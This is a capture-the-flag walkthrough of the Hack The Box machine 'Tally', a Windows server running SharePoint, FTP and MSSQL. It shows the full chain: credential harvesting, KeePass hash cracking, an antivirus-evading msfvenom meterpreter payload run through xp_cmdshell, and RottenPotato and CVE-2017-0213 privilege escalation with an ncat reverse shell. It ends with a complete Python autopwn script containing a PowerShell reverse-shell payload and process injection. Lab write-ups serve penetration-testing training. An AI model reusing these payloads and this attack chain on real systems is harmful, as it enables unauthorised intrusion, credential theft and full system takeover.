Tally write-up
Ανάλυση του Tally
Enumeration
Port scanning
Let’s scan the full range of TCP ports using my tool htbscan.py (you can find it here: https://github.com/Alamot/code-snippets/blob/master/enum/htbscan.py):
$ sudo ./htbscan.py 10.10.10.59 300
Running command: sudo masscan -e tun0 -p0-65535 --max-rate 300 --interactive 10.10.10.59
Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2018-05-03 12:04:44 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 49668/tcp on 10.10.10.59
Discovered open port 80/tcp on 10.10.10.59
Discovered open port 445/tcp on 10.10.10.59
Discovered open port 32843/tcp on 10.10.10.59
Discovered open port 49665/tcp on 10.10.10.59
Discovered open port 1433/tcp on 10.10.10.59
Discovered open port 135/tcp on 10.10.10.59
Discovered open port 32844/tcp on 10.10.10.59
Discovered open port 81/tcp on 10.10.10.59
Discovered open port 49667/tcp on 10.10.10.59
Discovered open port 32846/tcp on 10.10.10.59
Discovered open port 49666/tcp on 10.10.10.59
Discovered open port 49666/tcp on 10.10.10.59
Discovered open port 47001/tcp on 10.10.10.59
Discovered open port 15567/tcp on 10.10.10.59
Discovered open port 49664/tcp on 10.10.10.59
Discovered open port 139/tcp on 10.10.10.59
Discovered open port 49670/tcp on 10.10.10.59
Running command: sudo nmap -A -p80,81,135,139,445,1433,15567,32843,32844,32846,47001,49664,49665,49666,49667,49668,49670 10.10.10.59
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-03 15:11 EEST
Nmap scan report for 10.10.10.59
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
81/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2016 13.00.1601.00; RTM
| ms-sql-ntlm-info:
| Target_Name: TALLY
| NetBIOS_Domain_Name: TALLY
| NetBIOS_Computer_Name: TALLY
| DNS_Domain_Name: TALLY
| DNS_Computer_Name: TALLY
|_ Product_Version: 10.0.14393
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2018-05-03T10:47:41
|_Not valid after: 2048-05-03T10:47:41
|_ssl-date: 2018-05-03T12:12:35+00:00; +3s from scanner time.
15567/tcp open http Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
| Negotiate
|_ NTLM
| http-ntlm-info:
| Target_Name: TALLY
| NetBIOS_Domain_Name: TALLY
| NetBIOS_Computer_Name: TALLY
| DNS_Domain_Name: TALLY
| DNS_Computer_Name: TALLY
|_ Product_Version: 10.0.14393
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
32843/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
32844/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
| ssl-cert: Subject: commonName=SharePoint Services/organizationName=Microsoft/countryName=US
| Subject Alternative Name: DNS:localhost, DNS:tally
| Not valid before: 2017-09-17T22:51:16
|_Not valid after: 9999-01-01T00:00:00
|_ssl-date: 2018-05-03T12:12:37+00:00; +3s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
32846/tcp open msexchange-logcopier Microsoft Exchange 2010 log copier
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2016 build 10586 - 14393 (96%), Microsoft Windows Server 2016 (95%), Microsoft Windows 10 1507 (93%), Microsoft Windows 10 1507 - 1607 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2012 R2 (93%), Microsoft Windows Server 2012 R2 Update 1 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Vista SP1 - SP2, Windows Server 2008 SP2, or Windows 7 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2s, deviation: 0s, median: 2s
| ms-sql-info:
| 10.10.10.59:1433:
| Version:
| name: Microsoft SQL Server 2016 RTM
| number: 13.00.1601.00
| Product: Microsoft SQL Server 2016
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2018-05-03 15:12:36
|_ start_date: 2018-05-03 13:47:08
Brute forcing Microsoft SharePoint
We see that Microsoft SharePoint is on the box. Let’s download the SharePointURLBrute tool from here: https://www.bishopfox.com/resources/tools/sharepoint-hacking-diggity/attack-tools/
$ perl SharePointURLBrute\ v1.1.pl -a http://10.10.10.59 -e SharePoint-UrlExtensions-18Mar2012.txt
Starting search for common SharePoint Pages
Start Time: Sun Nov 5 11:37:15 2017
FOUND: http://10.10.10.59/_catalogs/masterpage/Forms/AllItems.aspx
FOUND: http://10.10.10.59/_catalogs/wp/Forms/AllItems.aspx
FOUND: http://10.10.10.59/_layouts/AreaNavigationSettings.aspx
FOUND: http://10.10.10.59/_Layouts/AreaTemplateSettings.aspx
FOUND: http://10.10.10.59/_Layouts/AreaWelcomePage.aspx
FOUND: http://10.10.10.59/_Layouts/ChangeSiteMasterPage.aspx
FOUND: http://10.10.10.59/_layouts/MyInfo.aspx
FOUND: http://10.10.10.59/_layouts/MyPage.aspx
FOUND: http://10.10.10.59/_layouts/PageSettings.aspx
FOUND: http://10.10.10.59/_layouts/policy.aspx
FOUND: http://10.10.10.59/_layouts/policyconfig.aspx
FOUND: http://10.10.10.59/_layouts/policycts.aspx
FOUND: http://10.10.10.59/_layouts/Policylist.aspx
FOUND: http://10.10.10.59/_Layouts/RedirectPage.aspx?Target={SiteCollectionUrl}_catalogs/masterpage
FOUND: http://10.10.10.59/_layouts/SiteDirectorySettings.aspx
FOUND: http://10.10.10.59/_layouts/sitemanager.aspx
FOUND: http://10.10.10.59/_Layouts/SiteManager.aspx?lro=all
FOUND: http://10.10.10.59/_vti_bin/alerts.asmx
FOUND: http://10.10.10.59/_vti_bin/dspsts.asmx
FOUND: http://10.10.10.59/_vti_bin/forms.asmx
FOUND: http://10.10.10.59/_vti_bin/Lists.asmx
FOUND: http://10.10.10.59/_vti_bin/people.asmx
FOUND: http://10.10.10.59/_vti_bin/Permissions.asmx
FOUND: http://10.10.10.59/_vti_bin/search.asmx
FOUND: http://10.10.10.59/_vti_bin/UserGroup.asmx
FOUND: http://10.10.10.59/_vti_bin/versions.asmx
FOUND: http://10.10.10.59/_vti_bin/Views.asmx
FOUND: http://10.10.10.59/_vti_bin/webpartpages.asmx
FOUND: http://10.10.10.59/_vti_bin/webs.asmx
FOUND: http://10.10.10.59/_vti_bin/SharepointEmailWS.asmx
FOUND: http://10.10.10.59/_vti_bin/spsearch.asmx
FOUND: http://10.10.10.59/_vti_bin/WebPartPages.asmx
FOUND: http://10.10.10.59/default.aspx
FOUND: http://10.10.10.59/shared documents/forms/allitems.aspx
Getting FTP credentials
If we open the http://10.10.10.59/shared%20documents/forms/allitems.aspx, we see a file named “ftp-details” modified by tally\administrator. Let’s download it and see what there is inside:
FTP details
hostname: tally
workgroup: htb.local
password: UTDRSCH53c"$6hys
Please create your own user folder upon logging in
Now, we know the FTP password but we lack the username. If we set a cookie named “mobile” equal to 1 (i.e. mobile=1) and reload the site, a gear appears at the top-right corner. We can click on that gear and select “Site Contents” and then “Site Pages”. There, we find an interesting link named “FinanceTeam.aspx” (again by tally\administrator). I originally found the gear by emulating a mobile device via my browser (using developer tools, google it if you don’t know what I am talking about). When I reloaded the site, the gear appeared at the top-right corner.
Let’s visit that link:
Migration update
Hi all,
Welcome to your new team page!
As always, there's still a few finishing touches to make. Rahul - please upload the design mock ups to the Intranet folder as 'index.html' using the ftp_user account - I aim to review regularly.
We'll also add the fund and client account pages in due course.
Thanks – Sarah & Tim.
Therefore our FTP credentials are ftp_user:UTDRSCH53c”$6hys
Getting SMB credentials
Connect using FTP and have a look in /User/Tim/log/do to.txt
To do:
Remove migration folder
Set secure share permissions
encrypted share creds:
password in keepass
Let’s download /User/Tim/Files/tim.kdbx and crack it:
keepass2john tim.kdbx > hash
john --format=KeePass --wordlist=/usr/share/dict/rockyou.txt hash
tim:simplementeyo
Now open tim.kbdx using keepass (Master password: simplementeyo)
$ keepass tim.kbdx
Go to Database -> WORK -> WINDOWS -> Shares. Here, we found some SMB credentials Finance:Acc0unting (right click and copy password to get the password)
Getting MSSQL credentials
Let’s connect to SMB:
$ smbclient -U Finance \\\\10.10.10.59\\ACCT
$ sudo mount -t cifs //10.10.10.59/ACCT /mnt/TEMP -o,user=Finance,password=Acc0unting,vers=2.0
Inside the smb:\zz_Migration\Binaries\new Folder\tester.exe we find this:
DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;
This means our MSSQL credentials are sa:GWE3V65#6KFH93@4GWTG2G
Getting shell
Let’s make a meterpreter payload using msfvenom. If we use the psh-reflection format our payload invade the antivirus detection:
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.105 LPORT=60000 -f psh-reflection -o msf.ps1
Don’t forget to set up your listener using exploit/multi/handler:
msf> use exploit/multi/handler
msf exploit(handler) > options
Module options (exploit/multi/handler):
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.105 yes The listen address
LPORT 60000 yes The listen port
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 127.0.0.1:6000
Now, upload msf.ps1 to /Intranet via FTP. We can execute our payload via MSSQL:
$ msfconsole
msf> use auxiliary/admin/mssql/mssql_exec
msf auxiliary(mssql_exec) > set CMD "powershell -ExecutionPolicy bypass -NoExit -File C:\\FTP\\Intranet\\msf.ps1"
msf auxiliary(mssql_exec) > info
Basic options:
Name Current Setting
---- ---------------
CMD powershell -ExecutionPolicy bypass -NoExit -File C:\FTP\Intranet\msf.ps1
PASSWORD GWE3V65#6KFH93@4GWTG2G
RHOST 10.10.10.59
RPORT 1433
TDSENCRYPTION false
USERNAME sa
USE_WINDOWS_AUTH false
msf auxiliary(mssql_exec) > exploit
And here is our meterpreter shell:
meterpreter > sysinfo
Computer : TALLY
OS : Windows 2016 (Build 14393).
Architecture : x64
System Language : en_GB
Domain : HTB.LOCAL
Logged On Users : 7
Meterpreter : x64/windows
Privilege Escalation
Using Incognito and RottenPotato
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
SeAssignPrimaryTokenPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
meterpreter > cd C:\\Users\\Sarah\\Desktop
meterpreter > upload rottenpotato.exe
[*] uploading : rottenpotato.exe -> rottenpotato.exe
[*] uploaded : rottenpotato.exe -> rottenpotato.exe
meterpreter > load incognito
Loading extension incognito...success.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================
TALLY\Sarah
Impersonation Tokens Available
========================================
NT SERVICE\SQLSERVERAGENT
meterpreter > execute -Hc -f C:\\Users\\Sarah\\Desktoprottenpotato.exe
Process 7996 created.
Channel 2 created.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================
TALLY\Sarah
Impersonation Tokens Available
========================================
NT AUTHORITY\SYSTEM
NT SERVICE\SQLSERVERAGENT
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > shell
Process 3452 created.
Channel 3 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Users\Sarah\Desktop> whoami
nt authority\system :D
Using CVE-2017-213
We can also use CVE-2017-213 for privilege escalation:
https://github.com/WindowsExploits/Exploits/blob/master/CVE-2017-0213/Source/CVE-2017-0213.cpp
Change the cmdline in CVE-2017-0213.cpp to run ncat or a powershell script to get a remote shell. E.g.:
orWCHAR cmdline[] = "C:\\Users\\Sarah\\Desktop\\ncat.exe 10.10.14.190 60002 -e cmd.exe"
WCHAR cmdline[] = L"powershell -ExecutionPolicy bypass -NoExit -File C:\\FTP\\Intranet\\shell.ps1";
Compile it, upload it and copy it in a folder where user has write permissions.
Migrate your existing shell to another process (Important! Otherwise it doesn’t work.)
Set up the listener on your side.
Execute CVE-2017-213.exe
You can download my autopwn script (and the other required files) from here: https://github.com/Alamot/code-snippets/tree/master/hacking/HTB/Tally
(Don’t forget to set LHOST appropriately. If you are using a Linux OS, the script tries to automatically get the LHOST IP from the tun0 interface).
#!/usr/bin/env python2
# Author: Alamot
import sys
import uuid
import fcntl
import _mssql
import signal
import ftplib
from pwn import *
from subprocess import call
from base64 import b64encode
signal.signal(signal.SIGINT, signal.SIG_DFL)
def get_ip_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15].encode())
)[20:24])
#LHOST = "10.10.15.247"
LHOST = get_ip_address('tun0')
LPORT1="60000"
LPORT2="60001"
LPORT3="60002"
FTP_SERVER = "10.10.10.59"
FTP_USERNAME = "ftp_user"
FTP_PASSWORD = "UTDRSCH53c\"$6hys"
FTP_UPLOADPATH = "Intranet"
MSSQL_SERVER = "10.10.10.59:1433"
MSSQL_USERNAME = "sa"
MSSQL_PASSWORD = "GWE3V65#6KFH93@4GWTG2G"
TIMEOUT = 60
def get_ps_payload(lost, lport):
return "$client = New-Object System.Net.Sockets.TCPClient('"+lost+"',"+lport+"); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close();"
payload1 = get_ps_payload(LHOST, LPORT1)
payload2 = get_ps_payload(LHOST, LPORT2)
payload3 = get_ps_payload(LHOST, LPORT3)
def initiate():
unique_filename1 = "msf1.ps1"
unique_filename2 = "msf2.ps1"
with open(unique_filename1,'wt') as f:
f.write(payload1)
with open(unique_filename2,'wt') as f:
f.write(payload3)
ftp = None
try:
ftp = ftplib.FTP(FTP_SERVER,FTP_USERNAME,FTP_PASSWORD)
log.success("Successful login at ftp server "+FTP_SERVER+" with username '"+FTP_USERNAME+"' and password '"+FTP_PASSWORD+"'")
log.info("Changing current working directory to " + FTP_UPLOADPATH)
ftp.cwd('/'+FTP_UPLOADPATH)
log.info("Uploading "+unique_filename1)
with open(unique_filename1,'rb') as f:
ftp.storbinary('STOR '+unique_filename1, f)
log.info("Uploading Invoke-PSInject.ps1")
with open("Invoke-PSInject.ps1",'rb') as f:
ftp.storbinary("STOR Invoke-PSInject.ps1", f)
log.info("Uploading "+unique_filename2)
with open(unique_filename2,'rb') as f:
ftp.storbinary('STOR '+unique_filename2, f)
log.info("Uploading cve2017213ps.exe")
with open("cve2017213ps.exe",'rb') as f:
ftp.storbinary("STOR cve2017213ps.exe", f)
except Exception as e:
log.failure("FTP failed: "+str(e))
finally:
if ftp:
ftp.quit()
mssql = None
try:
mssql = _mssql.connect(server=MSSQL_SERVER, user=MSSQL_USERNAME, password=MSSQL_PASSWORD)
log.success("Successful login at mssql server "+MSSQL_SERVER+" with username '"+MSSQL_USERNAME+"' and password '"+MSSQL_PASSWORD+"'")
log.info("Enabling 'xp_cmdshell'")
mssql.execute_query("EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec SP_CONFIGURE 'xp_cmdshell', 1;RECONFIGURE -- ")
mssql.execute_query("EXEC master..xp_cmdshell 'powershell -ExecutionPolicy bypass -NoExit -File C:\\FTP\\"+FTP_UPLOADPATH+"\\"+unique_filename1+"'")
except Exception as e:
log.failure("MSSQL failed: "+str(e))
finally:
if mssql:
mssql.close()
log.info("LHOST = "+LHOST)
try:
threading.Thread(target=initiate).start()
except Exception as e:
log.error(str(e))
ps1 = listen(LPORT1, timeout=TIMEOUT).wait_for_connection()
if ps1.sock is None:
log.failure("Connection timeout.")
sys.exit()
ps1.sendline("cd C:\\FTP\\"+FTP_UPLOADPATH+"\\")
ps1.sendline(". .\\Invoke-PSInject.ps1")
ps1.sendline("Invoke-PSInject -ProcName sihost -PoshCode "+b64encode(payload2.encode('UTF-16LE')))
ps2 = listen(LPORT2, timeout=TIMEOUT).wait_for_connection()
if ps2.sock is None:
log.failure("Connection timeout.")
sys.exit()
ps2.sendline("copy C:\\FTP\\"+FTP_UPLOADPATH+"\\cve2017213ps.exe C:\\TEMP\\cve2017213ps.exe")
ps2.sendline("cd C:\\TEMP\\")
ps2.sendline(". .\\cve2017213ps.exe")
ps3 = listen(LPORT3, timeout=TIMEOUT).wait_for_connection()
if ps3.sock is None:
log.failure("Connection timeout.")
sys.exit()
ps3.interactive()
sys.exit()
Here is the output:
[*] LHOST = 10.10.15.247
[+] Trying to bind to 0.0.0.0 on port 60000: Done
[+] Waiting for connections on 0.0.0.0:60000: Got connection from 10.10.10.59 on port 50143
[+] Successful login at ftp server 10.10.10.59 with username 'ftp_user' and password 'UTDRSCH53c"$6hys'
[*] Changing current working directory to Intranet
[*] Uploading msf1.ps1
[*] Uploading Invoke-PSInject.ps1
[*] Uploading msf2.ps1
[*] Uploading cve2017213ps.exe
[+] Successful login at mssql server 10.10.10.59:1433 with username 'sa' and password 'GWE3V65#6KFH93@4GWTG2G'
[*] Enabling 'xp_cmdshell'
[+] Trying to bind to 0.0.0.0 on port 60001: Done
[+] Waiting for connections on 0.0.0.0:60001: Got connection from 10.10.10.59 on port 50154
[+] Trying to bind to 0.0.0.0 on port 60002: Done
[+] Waiting for connections on 0.0.0.0:60002: Got connection from 10.10.10.59 on port 50161
[*] Switching to interactive mode
$ whoami
nt authority\system
PS C:\Windows\system32$
What about exploiting Firefox
On the box, there is Firefox version 44.0.2 and a script automatically opens C:\FTP\Intranet\index.html every now and then:
C:\Users\Sarah\Desktop> type browser.bat
...
REM copy latest mockups to webroot
copy /Y C:\FTP\Intranet\index.html C:\inetpub\wwwroot\HRTJYKYRBSHYJ\index.html
REM browse file
start "" "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" "http://127.0.0.1:81/HRTJYKYRBSHYJ/index.html"
...
In theory, we could exploit it by uploading an evil index.html via the FTP.
$ searchsploit firefox 44.0.2 -w
Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution https://www.exploit-db.com/exploits/44294/
Unfortunately, I was not able to make it work. I even enabled RDP on the box and I connected to check what is going on. The exploit is opened normally but the firefox either crashes or it doesn’t execute the payload properly.